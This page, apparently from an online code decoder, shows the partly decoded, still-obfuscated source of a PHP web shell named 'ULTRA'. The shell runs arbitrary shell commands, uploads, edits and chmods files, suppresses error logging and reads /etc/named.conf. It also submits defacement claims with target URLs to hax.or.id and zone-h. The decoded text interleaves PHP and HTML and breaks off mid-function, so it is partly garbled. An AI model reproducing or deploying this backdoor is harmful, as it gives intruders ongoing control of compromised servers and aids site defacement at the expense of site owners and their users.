Online PHP and Javascript Decoder decode hidden script to uncover its real functionality



 goto eW74y; uXhyh: @ini_set("\x65\162\162\x6f\162\137\x6c\x6f\x67", 0); goto Pmlrc; gAdci: if (isset($_POST["\x6e\145\x77\x50\x65\x72\x6d"]) && isset($_GET["\x69\164\145\x6d"])) { if ($_POST["\x6e\x65\x77\120\x65\x72\x6d"] == '') { flash("\131\157\165\x20\x6d\151\163\x73\40\141\x6e\40\151\x6d\160\157\162\x74\x61\156\x74\x20\x76\141\x6c\x75\145", "\117\157\x6f\x70\163\163\x2e\x2e", "\167\x61\162\156\151\x6e\x67", "\77\x64\151\162\75{$path}"); } if (chmod($path . "\57" . $_GET["\x69\x74\145\x6d"], $_POST["\x6e\145\167\x50\145\162\x6d"])) { flash("\103\x68\x61\156\147\x65\x20\x50\145\x72\155\x69\x73\x73\151\x6f\156\x20\123\x75\143\x63\x65\x73\x73\x66\x75\154\x6c\x79\41", "\x53\x75\143\x63\x65\x73\163", "\x73\x75\143\143\145\x73\x73", "\77\x64\x69\162\75{$path}"); } else { flash("\103\x68\x61\156\x67\x65\x20\120\x65\162\x6d\x69\163\163\151\x6f\156", "\x46\x61\x69\154\x65\x64", "\x65\162\162\157\x72", "\x3f\144\x69\162\75{$path}"); } } goto pjrZi; IcTKd: echo $dom; goto Y6Ol3; wl__9: if (isset($_POST["\156\x65\167\103\157\156\x74\x65\156\164"]) && isset($_GET["\x69\164\145\x6d"])) { if (file_put_contents($path . "\x2f" . $_GET["\151\164\145\155"], $_POST["\156\145\167\103\x6f\x6e\164\145\156\x74"])) { flash("\105\144\151\164\40\123\x75\143\143\145\x73\x73\146\165\x6c\154\x79\x21", "\123\165\x63\x63\145\x73\x73", "\163\x75\143\x63\x65\163\163", "\77\144\151\162\75{$path}"); } else { flash("\x45\x64\x69\164\40\x46\141\151\x6c\x65\x64", "\x46\x61\x69\x6c\145\x64", "\x65\x72\162\x6f\x72", "\77\144\x69\x72\x3d{$path}"); } } goto gAdci; HZ9Lj:
&action=upload"><i class="fa fa-upload"></i> Upload</a> <a class="btn btn-outline-light btn-sm m-1"href="?dir=goto Er7K8; O6ujO: if (isset($_FILES["\x75\160\x6c\x6f\x61\x64\146\151\x6c\145"])) { $total = count($_FILES["\165\x70\x6c\157\x61\144\146\151\154\x65"]["\x6e\x61\155\145"]); for ($i = 0; $i < $total; $i++) { $mainupload = move_uploaded_file($_FILES["\x75\x70\x6c\157\141\x64\x66\x69\154\x65"]["\x74\x6d\x70\x5f\156\x61\155\145"][$i], $_FILES["\165\x70\154\157\141\144\146\x69\154\145"]["\156\141\155\x65"][$i]); } if ($total < 2) { if ($mainupload) { flash("\125\x70\154\x6f\x61\144\40\x46\x69\154\x65\x20\x53\165\143\x63\145\x73\x73\146\165\154\154\x79\41\40", "\x53\165\x63\x63\145\163\163", "\x73\165\x63\143\145\x73\x73", "\77\144\151\x72\x3d{$path}"); } else { flash("\125\x70\154\x6f\141\x64\x20\x46\x61\151\154\145\144", "\106\141\x69\x6c\x65\144", "\145\x72\162\157\x72", "\x3f\x64\151\162\75{$path}"); } } else { if ($mainupload) { flash("\x55\160\154\x6f\141\x64\x20{$i}\x20\106\x69\x6c\x65\x73\x20\x53\x75\x63\x63\x65\163\163\146\x75\154\154\171\41\40", "\x53\165\x63\x63\145\x73\163", "\x73\165\143\x63\145\x73\163", "\77\x64\151\x72\x3d{$path}"); } else { flash("\125\160\x6c\x6f\x61\144\x20\106\141\x69\154\145\x64", "\106\141\151\x6c\x65\x64", "\145\x72\162\x6f\162", "\x3f\144\x69\x72\75{$path}"); } } } goto avjbc; JnUPN: if (isset($_GET["\144\151\162"])) { $path = $_GET["\x64\x69\162"]; chdir($_GET["\x64\x69\x72"]); } else { $path = getcwd(); } goto S_Ins; ZEVEw: clearstatcache(); goto PfUbD; ro72t:
&item=goto neHdM; OdB13: if (!$d0mains) { $dom = "\x43\141\156\x74\40\162\145\141\x64\40\x2f\x65\x74\143\x2f\156\x61\155\x65\144\56\x63\x6f\156\146"; $GLOBALS["\x6e\x65\145\144\137\x74\x6f\137\x75\x70\144\x61\164\145\137\x68\x65\x61\144\x65\x72"] = "\x74\162\165\145"; } else { $count = 0; foreach ($d0mains as $d0main) { if (@strstr($d0main, "\172\x6f\x6e\x65")) { preg_match_all("\x23\x7a\x6f\x6e\x65\40\x22\50\x2e\x2a\51\42\43", $d0main, $domains); flush(); if (strlen(trim($domains[1][0])) > 2) { flush(); $count++; } } } $dom = "{$count}\40\x44\157\155\x61\151\156"; } goto poc0c; xClML: $exdir = explode("\x2f", $path); goto MZwQP; YyTsb: if (isset($_SESSION["\155\145\x73\163\x61\x67\x65"])) {
Swal.fire(
                'echo $_SESSION["\x73\x74\x61\x74\165\163"];
',
                'echo $_SESSION["\x6d\x65\163\x73\x61\147\145"];
',
                'echo $_SESSION["\143\x6c\141\x73\163"];
'
                )} goto kb2Lf; Y6Ol3:
</td></tr><tr><td style="width:7%">Permission</td><td style="width:1%">:</td><td>[goto PksS1; MWqix: echo $dir; goto n0dC1; neHdM: echo $dir; goto HZ9Lj; Pmlrc: @ini_set("\154\157\x67\x5f\145\162\162\157\x72\163", 0); goto e8bui; oPzqk: echo $serv; goto N62aP; eW74y: session_start(); goto fVczE; ISdM5: $d0mains = @file("\x2f\x65\164\x63\57\x6e\x61\x6d\145\144\56\143\157\156\x66", false); goto OdB13; n0dC1:
&action=notify"><i class="fa fa-cloud"></i> Notify</a></div><center><hr width="20%"></center><div class="container"id="tools">goto Wcul1; HUvlR: if (isset($_GET["\x61\x63\x74\151\157\156"]) && $_GET["\141\x63\x74\151\157\156"] != "\x64\145\154\x65\x74\x65") { $action = $_GET["\141\x63\x74\151\157\156"];
<div class="col-md-12"><div class="justify-content-center row"><div class="col-md-5">if ($action == "\162\145\156\141\x6d\x65" && isset($_GET["\151\164\145\155"])) {
<form action=""method="post"><div class="mb-3"><label class="form-label"for="name">New Name</label> <input class="form-control"name="newName"value="echo $_GET["\x69\x74\x65\155"];
"></div><button class="btn btn-outline-light"type="submit">Submit</button> <button class="btn btn-outline-light"type="button"onclick="history.go(-1)">Back</button></form>} elseif ($action == "\x65\x64\151\x74" && isset($_GET["\151\164\145\x6d"])) {
<form action=""method="post"><div class="mb-3"><label class="form-label"for="name">echo $_GET["\x69\x74\145\155"];
</label> <textarea class="form-control"name="newContent"rows="10"id="CopyFromTextArea">echo htmlspecialchars(file_get_contents($path . "\x2f" . $_GET["\151\x74\x65\155"]));
</textarea></div><button class="btn btn-outline-light"type="submit">Submit</button> <button class="btn btn-outline-light"type="button"onclick="jscopy()">Copy</button> <button class="btn btn-outline-light"type="button"onclick="history.go(-1)">Back</button></form>} elseif ($action == "\x63\150\x6d\x6f\144" && isset($_GET["\151\x74\x65\155"])) {
<form action=""method="post"><div class="mb-3"><label class="form-label"for="name">echo $_GET["\x69\x74\145\155"];
</label> <input class="form-control"name="newPerm"value="echo substr(sprintf("\x25\x6f", fileperms($_GET["\151\x74\145\x6d"])), -4);
"></div><button class="btn btn-outline-light"type="submit">Submit</button> <button class="btn btn-outline-light"type="button"onclick="history.go(-1)">Back</button></form>} elseif ($action == "\x75\160\x6c\x6f\141\x64") {
<form action=""method="post"enctype="multipart/form-data"><div class="mb-3"><label class="form-label">File Uploader</label><div class="input-group"><input class="form-control"name="uploadfile[]"aria-describedby="inputGroupFileAddon04"aria-label="Upload"id="inputGroupFile04"multiple type="file"> <button class="btn btn-outline-light"type="submit"id="inputGroupFileAddon04">Upload</button></div></div></form>} elseif ($action == "\143\157\x6d\155\141\156\x64") {
<form action=""method="post"><div class="mb-3"><label class="form-label">Command</label><div class="input-group"><input class="form-control form-control-sm"name="ucmd"placeholder="whoami"> <button class="btn btn-outline-light"type="submit">Submit</button></div></div></form>} elseif ($action == "\156\x6f\x74\151\x66\x79") { archive(); }
</div></div></div>} goto EUmoC; C3aZC: function flash($message, $status, $class, $redirect = false) { if (!empty($_SESSION["\155\145\x73\163\x61\x67\x65"])) { unset($_SESSION["\155\145\x73\163\x61\147\x65"]); } if (!empty($_SESSION["\143\x6c\x61\x73\x73"])) { unset($_SESSION["\143\154\x61\x73\163"]); } if (!empty($_SESSION["\163\x74\141\x74\165\163"])) { unset($_SESSION["\x73\164\141\x74\165\163"]); } $_SESSION["\155\x65\163\163\x61\x67\x65"] = $message; $_SESSION["\x63\x6c\x61\163\x73"] = $class; $_SESSION["\163\164\x61\164\x75\163"] = $status; if ($redirect) { header("\x4c\x6f\143\141\164\151\157\x6e\72\40" . $redirect); die; } return true; } goto s86qF; r2G8_:
<div class="col-md-12"><div class="collapse"id="newFileCollapse"data-bs-parent="#tools"><div class="justify-content-center row"><div class="col-md-5"><form action=""method="post"><div class="mb-3"><label class="form-label">File Name</label> <input class="form-control"name="newFileName"placeholder="test.php"></div><div class="mb-3"><label class="form-label">File Content</label> <textarea class="form-control"name="newFileContent"rows="7"placeholder="Hello-World"></textarea></div><button class="btn btn-outline-light"type="submit">Create</button></form></div></div></div></div><div class="col-md-12"><div class="collapse"id="newFolderCollapse"data-bs-parent="#tools"><div class="justify-content-center row"><div class="col-md-5"><form action=""method="post"><div class="mb-3"><label class="form-label">Folder Name</label> <input class="form-control"name="newFolderName"placeholder="home"></div><button class="btn btn-outline-light"type="submit">Create</button></form></div></div></div></div></div></div><div class="mt-3 table-responsive"><table class="text-light table align-middle table-dark table-hover"><thead class="align-middle"><tr><td style="width:35%">Name</td><td style="width:10%">Type</td><td style="width:10%">Size</td><td style="width:13%">Owner/Group</td><td style="width:10%">Permission</td><td style="width:13%">Last Modified</td><td style="width:9%">Actions</td></tr></thead><tbody class="text-nowrap">goto o7m6C; IqEKw: if (isset($_POST["\x6e\145\x77\106\151\154\x65\116\141\155\x65"]) && isset($_POST["\156\x65\x77\106\151\x6c\145\x43\157\156\164\145\x6e\164"])) { if (file_put_contents($_POST["\156\x65\167\x46\x69\x6c\145\116\x61\x6d\145"], $_POST["\x6e\x65\x77\x46\151\x6c\x65\x43\x6f\156\164\145\x6e\x74"])) { flash("\x43\162\x65\x61\164\x65\40\x46\151\x6c\x65\40\x53\165\143\x63\x65\163\163\146\165\x6c\x6c\x79\41", "\x53\x75\143\x63\x65\x73\x73", "\163\165\x63\143\145\163\163", "\x3f\144\151\x72\x3d{$path}"); } else { flash("\x43\162\145\x61\164\145\40\106\151\154\145\40\106\x61\151\x6c\x65\144", "\106\141\151\154\x65\144", "\145\x72\x72\157\x72", "\77\144\151\x72\x3d{$path}"); } } goto UW_bj; lEsKp: header("\x43\157\156\x74\145\156\x74\55\124\171\x70\x65\x3a\40\164\x65\170\164\x2f\150\164\x6d\x6c"); goto Rg3Jc; avjbc: $dirs = scandir($path); goto ISdM5; N62aP:
]</title><link href="https://fonts.googleapis.com/css2?family=Ubuntu+Mono"rel="stylesheet"><style type="text/css">*{font-family:Ubuntu Mono}a{text-decoration:none;color:#fff}a:hover{color:#fff}::-webkit-scrollbar{width:7px;height:7px}::-webkit-scrollbar-thumb{background:grey;border-radius:7px}::-webkit-scrollbar-track{box-shadow:inset 0 0 7px grey;border-radius:7px}.td-break{word-break:break-all}</style></head><body class="text-light bg-dark"><div class="container-fluid"><div class="py-3"id="main"><div class="p-4 rounded-3"><table class="text-light table table-borderless"><tr><td style="width:7%">Operation</td><td style="width:1%">:</td><td>goto XFq5M; vac8y:
&action=command"><i class="fa fa-terminal"></i> Command</a> <a class="btn btn-outline-light btn-sm m-1"href="?dir=goto L0tMT; MZwQP: function getOwner($item) { if (function_exists("\160\157\x73\x69\x78\137\x67\x65\x74\x70\x77\165\151\x64")) { $downer = @posix_getpwuid(fileowner($item)); $downer = $downer["\x6e\141\x6d\145"]; } else { $downer = fileowner($item); } if (function_exists("\x70\x6f\x73\x69\x78\x5f\x67\145\x74\x67\162\x67\x69\144")) { $dgrp = @posix_getgrgid(filegroup($item)); $dgrp = $dgrp["\156\141\x6d\x65"]; } else { $dgrp = filegroup($item); } return $downer . "\x2f" . $dgrp; } goto XouiW; Er7K8: echo $path; goto YyUfA; Wcul1: if (isset($_GET["\x61\143\164\151\x6f\x6e"]) && $_GET["\141\143\x74\x69\x6f\x6e"] != "\x64\x6f\x77\x6e\x6c\x6f\141\144") { $action = $_GET["\x61\x63\164\x69\x6f\x6e"]; } goto HUvlR; iWPNZ:
]</td></tr></table><div class="p-2"><i class="fa fa fa-folder pt-1"></i> 	
                        goto ailcV; DRFLj: $uip = $_SERVER["\122\105\115\117\124\x45\x5f\x41\x44\104\122"]; goto bZNWy; qJViL: echo $path; goto ro72t; n9oNM: @ini_set("\144\x69\163\x70\154\141\171\137\145\x72\162\157\162\163", 0); goto uXhyh; cQcSV: echo $ip; goto GR0sL; PksS1: echo writable($path, perms($path)); goto iWPNZ; CcB8W: echo $soft; goto i_owN; EUmoC: if (isset($_POST["\165\x63\155\x64"])) {
<div class="p-2"><div class="justify-content-center row"><div class="mb-3 card col-md-7 text-dark"><pre>echo $ip . "\x40" . $serv . "\x3a\46\156\142\163\160\x3b\x7e\44\x26\x6e\x62\163\160\73"; echo $cmd = $_POST["\165\143\x6d\144"]; $cmd . "\74\x62\162\76";
<br><code>echo cmd($cmd);
</code></pre></div></div></div>} goto r2G8_; Gzfmz: $uname = function_exists("\x70\x68\160\x5f\x75\x6e\x61\155\145") ? substr(@php_uname(), 0, 120) : (strlen($cmd_uname) > 0 ? $cmd_uname : "\x55\x6e\x61\155\145\40\x45\162\162\x6f\162\x21"); goto dnwrj; Os7dD: $soft = $_SERVER["\123\105\x52\x56\105\x52\x5f\123\117\x46\124\127\101\122\105"]; goto afegR; GV7Gs: function archive() { if (isset($_POST["\156\x69\x63\x6b"]) && isset($_POST["\x74\145\x61\x6d"]) && isset($_POST["\x77\145\142\154\x69\x73\164"])) { $nickname = $_POST["\x6e\x69\143\x6b"]; $team = $_POST["\164\x65\x61\x6d"]; $weblists = explode("\xd\12", $_POST["\167\x65\x62\154\x69\163\164"]); function hax0r($nick, $team = '', $url) { $ch = curl_init("\x68\x74\164\160\163\72\x2f\57\150\141\170\x2e\157\162\x2e\151\x64\57\156\157\164\x69\146\171\57\x73\x69\x6e\147\154\145"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array("\144\x65\x66\141\x63\145\162" => $nick, "\x74\x65\x61\155" => $team, "\x76\x75\x6c\156\164\x79\160\x65" => 1, "\x72\145\x61\163\x6f\x6e" => 1, "\167\145\142\164\141\162\x67\145\164" => $url, "\x73\x75\x62\x6d\151\x74" => "\116\157\x74\151\x66\171")); return curl_exec($ch); curl_close($ch); } function z0ne($nick, $url) { $ch = curl_init("\x68\x74\x74\160\72\57\57\167\167\167\56\172\157\x6e\x65\x2d\x68\56\143\157\155\57\156\157\164\151\146\171\57\x73\x69\156\x67\154\x65"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array("\144\x65\146\x61\143\145\162" => $nick, "\x64\x6f\x6d\x61\151\156\61" => $url, "\150\x61\143\153\x6d\x6f\144\x65" => 1, "\x72\145\141\163\157\x6e" => 1, "\163\x75\142\155\x69\x74" => "\123\x65\x6e\144")); return curl_exec($ch); curl_close($ch); } echo "\74\x63\x65\156\164\145\x72\76\x2d\x2d\55\x2d\55\55\x2d\x20\x52\x65\x73\x75\x6c\164\40\x2d\x2d\55\x2d\x2d\55\55\x3c\57\x63\x65\x6e\164\145\x72\x3e\74\x62\162\76"; foreach ($weblists as $url) { $archiveh = hax0r($nickname, $team, $url); $archivez = z0ne($nickname, $url); if (preg_match("\x3c\x64\x69\x76\x20\143\154\x61\163\x73\75\47\x61\154\x65\162\164\x20\141\x6c\x65\x72\x74\55\x73\165\143\143\x65\x73\163\x27\40\162\157\x6c\x65\x3d\47\141\x6c\145\162\164\47\x3e", $archiveh)) { $z0neh = "\74\x66\157\x6e\164\40\143\157\154\157\162\x3d\x6c\151\x6d\x65\76\117\x4b\74\57\x66\x6f\156\x74\76"; } else { $z0neh = "\x3c\146\157\x6e\x74\40\x63\157\154\157\162\x3d\x72\x65\x64\76\x45\x52\122\117\122\x3c\57\146\x6f\156\x74\76"; } if (preg_match("\57\143\157\154\x6f\x72\75\42\x72\x65\144\x22\76\x4f\x4b\74\134\x2f\146\x6f\156\x74\76\x3c\x5c\57\x6c\x69\76\x2f\x69", $archivez)) { $hax0rid = "\74\x66\x6f\x6e\164\x20\143\x6f\154\157\x72\75\154\x69\155\145\76\117\113\x3c\57\146\157\x6e\164\76"; } else { $hax0rid = "\x3c\146\157\x6e\164\40\143\157\154\157\x72\x3d\162\x65\144\x3e\105\122\122\117\x52\x3c\57\x66\x6f\156\164\x3e"; } echo "{$url}\40\x5a\110\x3a\40{$z0neh}\54\x20\110\x49\x44\72\40{$hax0rid}\74\142\x72\x3e"; } echo "\x3c\x62\x72\76\x48\141\170\157\x72\x2d\x49\x44\72\40\x3c\x61\x20\x68\162\x65\x66\x3d\47\x68\x74\x74\x70\x73\x3a\x2f\x2f\150\x61\x78\157\162\56\x69\x64\x2f\x61\162\x63\x68\151\x76\145\57\x61\164\164\x61\143\x6b\145\162\57{$nickname}\x27\40\164\x61\162\147\x65\x74\x3d\47\x5f\142\154\141\156\x6b\47\x3e\150\x74\x74\x70\x73\x3a\x2f\57\x68\x61\x78\x6f\162\56\x69\x64\x2f\x61\162\x63\x68\151\x76\145\x2f\x61\x74\164\x61\x63\153\x65\162\x2f{$nickname}\x3c\x2f\x61\x3e\74\142\162\76"; echo "\x5a\157\156\145\x2d\x48\x3a\x20\74\141\x20\150\162\145\x66\x3d\47\150\x74\164\160\x3a\57\57\x77\167\167\56\172\157\x6e\x65\x2d\150\56\157\x72\147\x2f\141\162\143\150\151\x76\x65\x2f\x6e\x6f\x74\151\x66\x69\145\162\x3d{$nickname}\47\40\x74\x61\162\x67\145\164\75\x27\x5f\x62\154\141\x6e\153\47\76\150\164\x74\x70\72\57\57\x77\167\x77\x2e\x7a\x6f\156\x65\55\150\x2e\x6f\162\x67\x2f\x61\162\143\150\151\166\145\57\x6e\157\x74\x69\x66\x69\x65\162\x3d{$nickname}\x3c\x2f\141\x3e"; } else { echo "\74\x66\157\162\155\40\141\143\x74\151\157\156\x3d\42\x22\x20\155\145\x74\x68\157\144\x3d\42\x70\157\163\x74\42\76\12\40\x20\40\40\x20\40\40\x20\40\40\x20\40\74\x64\151\x76\x20\143\154\141\x73\163\75\x22\x6d\142\55\63\42\x3e\12\40\40\x20\x20\x20\x20\x20\x20\x20\x20\40\x20\x20\40\x20\x20\74\154\141\x62\145\x6c\40\143\154\x61\163\163\x3d\42\x66\157\162\x6d\x2d\x6c\141\x62\x65\x6c\x22\76\x4e\x69\143\x6b\x6e\141\155\145\x3c\57\x6c\141\x62\145\154\76\12\40\40\x20\x20\40\x20\x20\40\40\x20\x20\40\x20\40\40\40\74\151\x6e\x70\165\164\x20\x74\x79\160\145\75\42\x74\145\x78\x74\42\x20\x63\x6c\x61\x73\x73\x3d\42\146\x6f\162\155\x2d\143\x6f\x6e\164\x72\157\154\42\x20\x6e\x61\x6d\x65\75\x22\156\x69\143\x6b\x22\40\160\154\141\x63\x65\x68\x6f\154\x64\145\162\x3d\42\x55\x4c\x54\122\x41\x22\40\162\x65\161\165\151\162\145\144\x3e\xa\x20\40\x20\40\x20\x20\x20\40\x20\x20\40\x20\74\57\x64\x69\x76\76\xa\40\x20\40\x20\x20\40\40\40\40\40\40\x20\74\144\151\x76\x20\143\x6c\x61\163\x73\x3d\42\x6d\142\x2d\x33\42\x3e\xa\40\x20\x20\x20\40\x20\40\40\x20\x20\x20\40\40\40\x20\x20\x3c\154\141\142\x65\154\40\143\154\x61\163\x73\75\42\x66\x6f\162\155\x2d\x6c\141\142\x65\x6c\x22\x3e\x54\145\141\x6d\74\x2f\x6c\x61\x62\x65\x6c\76\xa\40\x20\x20\40\40\x20\x20\40\x20\x20\x20\x20\40\x20\40\40\x3c\151\x6e\x70\165\164\40\164\171\x70\x65\x3d\x22\x74\x65\170\164\42\x20\143\154\x61\163\x73\x3d\42\x66\157\162\155\x2d\143\157\x6e\164\162\157\x6c\x22\40\x6e\x61\x6d\145\x3d\x22\164\145\x61\x6d\42\40\160\x6c\x61\143\x65\x68\157\x6c\x64\145\x72\x3d\x22\125\114\x54\x52\x41\42\76\xa\x20\x20\x20\40\x20\x20\x20\x20\x20\40\40\40\x3c\x2f\144\x69\166\x3e\xa\40\40\x20\x20\x20\40\40\40\x20\x20\40\x20\x3c\144\x69\166\x20\143\x6c\x61\x73\163\x3d\x22\x6d\x62\x2d\x33\42\x3e\xa\40\40\40\x20\x20\40\x20\40\40\x20\x20\x20\x20\x20\40\40\x3c\x6c\x61\x62\x65\154\40\x63\x6c\141\163\163\x3d\42\x66\x6f\x72\155\x2d\154\141\x62\145\154\x22\76\x57\145\x62\x73\x69\x74\145\74\57\x6c\x61\142\x65\154\76\12\40\x20\40\40\x20\x20\40\x20\40\40\40\40\x20\40\40\x20\74\x74\x65\170\x74\x61\162\145\141\40\143\154\141\163\x73\x3d\42\146\157\162\155\x2d\143\x6f\x6e\164\x72\x6f\154\42\x20\x6e\141\x6d\x65\75\x22\167\x65\142\x6c\151\x73\164\x22\40\162\x6f\167\x73\x3d\42\x37\42\40\160\x6c\x61\143\x65\150\x6f\x6c\x64\x65\x72\x3d\x22\x68\x74\164\x70\x73\72\57\x2f\145\x78\x61\x6d\x70\154\145\x2e\143\x6f\x6d\42\x3e\x3c\x2f\164\x65\170\164\x61\162\145\x61\76\xa\x20\x20\x20\40\x20\x20\x20\x20\x20\x20\x20\x20\74\x2f\x64\x69\166\x3e\12\x20\40\40\x20\x20\40\x20\x20\x20\x20\x20\40\x3c\x62\165\164\x74\x6f\156\x20\x63\154\141\163\x73\x3d\x22\142\164\156\x20\x62\x74\x6e\x2d\x6f\165\164\154\151\156\x65\x2d\x6c\x69\147\x68\164\x22\40\x74\x79\160\x65\x3d\x22\163\165\x62\155\x69\x74\x22\x3e\123\x75\x62\155\x69\x74\74\57\x62\x75\x74\x74\157\x6e\x3e\xa\x20\x20\x20\40\x20\x20\40\x20\x3c\57\146\x6f\x72\155\x3e"; } } goto KY33v; QvBWh: header_remove("\170\x2d\x70\157\167\x65\x72\145\144\x2d\142\171"); goto Sw6hf; L0tMT: echo $path; goto VMjt_; YyUfA:
&item=goto I1t2B; poc0c: $ip = gethostbyname($_SERVER["\110\x54\x54\120\x5f\x48\117\x53\x54"]); goto DRFLj; i4jNt:
</div><div id="tools"><center><hr width="20%"></center><div class="justify-content-center d-flex flex-wrap my-3"><a class="btn btn-outline-light btn-sm m-1"href="?"><i class="fa fa-home"></i> Home</a> <a class="btn btn-outline-light btn-sm m-1"href="?dir=goto qJViL; GR0sL:
	 | Your IP:goto ZCkeZ; PfUbD: header("\x58\x2d\103\x6f\156\x74\145\156\164\55\x54\x79\x70\145\55\117\160\164\151\x6f\156\163\72\40\60"); goto Hztsv; VMjt_:
&item=goto MWqix; afegR: $cmd_uname = cmd("\x75\x6e\141\155\145\x20\x2d\141"); goto Gzfmz; Z6jIr: function writable($path, $perms) { return !is_writable($path) ? "\x3c\x66\x6f\x6e\164\40\x63\x6f\154\157\x72\x3d\x22\162\145\144\x22\x3e" . $perms . "\74\57\146\x6f\156\164\76" : "\74\146\157\x6e\x74\x20\x63\x6f\x6c\x6f\162\x3d\42\x6c\x69\155\x65\42\x3e" . $perms . "\x3c\x2f\146\x6f\156\x74\x3e"; } goto xO2XC; S_Ins: $path = str_replace("\134", "\57", $path); goto xClML; dnwrj:
<html><head><meta charset="utf-8"><meta content="width=device-width,initial-scale=1"name="viewport"><meta content="noindex, nofollow"name="robots"><link href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/css/bootstrap.min.css"rel="stylesheet"crossorigin="anonymous"integrity="sha384-1BmE4kWBq78iYhFldvKuhfTAU6auU8tT94WrHftjDbrCEXSU1oBoqyl2QvZ6jIW3"><link href="https://pro.fontawesome.com/releases/v5.10.0/css/all.css"rel="stylesheet"crossorigin="anonymous"integrity="sha384-AYmEC3Yw5cVb3ZcuHtOA93w35dYTsvhLPVnYs9eStHfGJvOvKxVfELGroGkvsg+p"><title>ULTRA [goto oPzqk; KY33v: if (isset($_POST["\x6e\145\x77\x46\x6f\154\144\145\x72\116\x61\x6d\x65"])) { if (mkdir($path . "\x2f" . $_POST["\x6e\145\167\106\157\x6c\x64\x65\162\x4e\141\x6d\x65"])) { flash("\x43\x72\145\141\164\145\x20\106\157\154\144\x65\x72\x20\123\165\x63\x63\145\163\163\146\165\154\x6c\171\41", "\x53\x75\143\x63\145\163\x73", "\x73\165\x63\x63\x65\x73\x73", "\77\x64\151\x72\75{$path}"); } else { flash("\x43\162\x65\x61\x74\x65\x20\x46\x6f\x6c\x64\x65\162\40\x46\x61\151\154\145\x64", "\106\x61\x69\x6c\145\x64", "\x65\162\162\x6f\x72", "\x3f\x64\x69\162\75{$path}"); } } goto IqEKw; qJhNl: @ini_set("\x6f\165\164\160\165\x74\137\x62\165\x66\146\145\162\x69\156\147", 0); goto n9oNM; bZNWy: $serv = $_SERVER["\x48\x54\124\120\137\110\117\x53\x54"]; goto Os7dD; ailcV: foreach ($exdir as $id => $pat) { if ($pat == '' && $id == 0) {
<a class="text-light text-decoration-none"href="?dir=/">/</a>} if ($pat == '') { continue; }
<a class="text-light text-decoration-none"href="?dir=for ($i = 0; $i <= $id; $i++) { echo "{$exdir[$i]}"; if ($i != $id) { echo "\57"; } }
">echo $pat;
</a><span class="text-light">/</span>} goto i4jNt; o7m6C: foreach ($dirs as $dir) { if (!is_dir($dir)) { continue; }
<tr><td>if ($dir === "\x2e\x2e") {
<a class="text-light text-decoration-none"href="?dir=echo dirname($path);
"><i class="fa fa-folder-open"></i>echo $dir;
</a>} elseif ($dir === "\56") {
<a class="text-light text-decoration-none"href="?dir=echo $path;
"><i class="fa fa-folder-open"></i>echo $dir;
</a>} else {
<a class="text-light text-decoration-none"href="?dir=echo $path . "\57" . $dir;
"><i class="fa fa-folder"></i>echo $dir;
</a>}
</td><td class="text-light">echo filetype($dir);
</td><td class="text-light">-</td><td class="text-light">echo getOwner($dir);
</td><td class="text-light">echo "\x3c\141\x20\150\x72\145\146\x3d\x22\77\144\x69\x72\x3d" . $path . "\x26\151\164\x65\155\x3d" . $dir . "\x26\141\143\164\x69\157\x6e\x3d\x63\x68\x6d\x6f\144\42\x3e"; if (is_writable($path . "\57" . $dir)) { echo "\x3c\146\x6f\x6e\x74\40\143\157\x6c\x6f\162\75\42\154\x69\x6d\145\x22\x3e"; } elseif (!is_readable($path . "\57" . $dir)) { echo "\x3c\146\x6f\156\164\x20\143\x6f\154\157\x72\75\42\162\145\144\x22\76"; } echo perms($path . "\57" . $dir); if (is_writable($path . "\57" . $dir) || !is_readable($path . "\57" . $dir)) { echo "\x3c\x2f\141\76"; }
</td><td class="text-light">echo date("\x59\x2d\155\55\x64\40\x68\72\x69\72\x73", filemtime($dir));
</td><td>if ($dir != "\x2e" && $dir != "\x2e\56") {
<div class="btn-group"><a class="btn btn-outline-light btn-sm mr-1"href="?dir=echo $path;
&item=echo $dir;
&action=rename"data-placement="auto"data-toggle="tooltip"title="Rename"><i class="fa fa-edit"></i></a> <a class="btn btn-outline-light btn-sm mr-1"href=""data-placement="auto"data-toggle="tooltip"title="Delete"onclick='return deleteConfirm("?dir=echo $path;
&item=echo $dir;
&action=delete")'><i class="fa fa-trash"></i></a></div>} elseif ($dir === "\x2e") {
<div class="btn-group"><a class="btn btn-outline-light btn-sm mr-1"href="#newFolderCollapse"data-placement="auto"data-toggle="tooltip"title="New Folder"aria-controls="newFolderCollapse"aria-expanded="false"data-bs-toggle="collapse"role="button"><i class="fa fa-folder-plus"></i></a> <a class="btn btn-outline-light btn-sm mr-1"href="#newFileCollapse"data-placement="auto"data-toggle="tooltip"title="New File"aria-controls="newFileCollapse"aria-expanded="false"data-bs-toggle="collapse"role="button"><i class="fa fa-file-plus"></i></a></div>@ini_set("\x6f\x75\164\x70\x75\164\137\x62\x75\146\x66\145\162\151\156\x67", 0); @ini_set("\x64\151\x73\x70\154\x61\171\x5f\x65\162\x72\x6f\162\163", 0); set_time_limit(0); ini_set("\x6d\145\155\x6f\x72\x79\x5f\154\x69\x6d\151\164", "\66\64\x4d"); header("\x43\157\156\164\x65\156\x74\x2d\x54\x79\160\x65\x3a\40\x74\145\x78\164\57\150\164\x6d\x6c\x3b\40\x63\150\x61\162\163\x65\164\75\x55\124\106\55\x38"); }
</td></tr>} goto AOd9n; PDQo4: function fsize($file) { $a = array("\102", "\113\x42", "\115\x42", "\107\102", "\124\x42", "\120\x42"); $pos = 0; $size = filesize($file); while ($size >= 1024) { $size /= 1024; $pos++; } return round($size, 2) . "\x20" . $a[$pos]; } goto JnUPN; xO2XC: function perms($path) { $perms = fileperms($path); if (($perms & 49152) == 49152) { $info = "\163"; } elseif (($perms & 40960) == 40960) { $info = "\154"; } elseif (($perms & 32768) == 32768) { $info = "\x2d"; } elseif (($perms & 24576) == 24576) { $info = "\x62"; } elseif (($perms & 16384) == 16384) { $info = "\144"; } elseif (($perms & 8192) == 8192) { $info = "\143"; } elseif (($perms & 4096) == 4096) { $info = "\x70"; } else { $info = "\x75"; } $info .= $perms & 256 ? "\162" : "\55"; $info .= $perms & 128 ? "\x77" : "\x2d"; $info .= $perms & 64 ? $perms & 2048 ? "\163" : "\170" : ($perms & 2048 ? "\123" : "\55"); $info .= $perms & 32 ? "\x72" : "\55"; $info .= $perms & 16 ? "\167" : "\x2d"; $info .= $perms & 8 ? $perms & 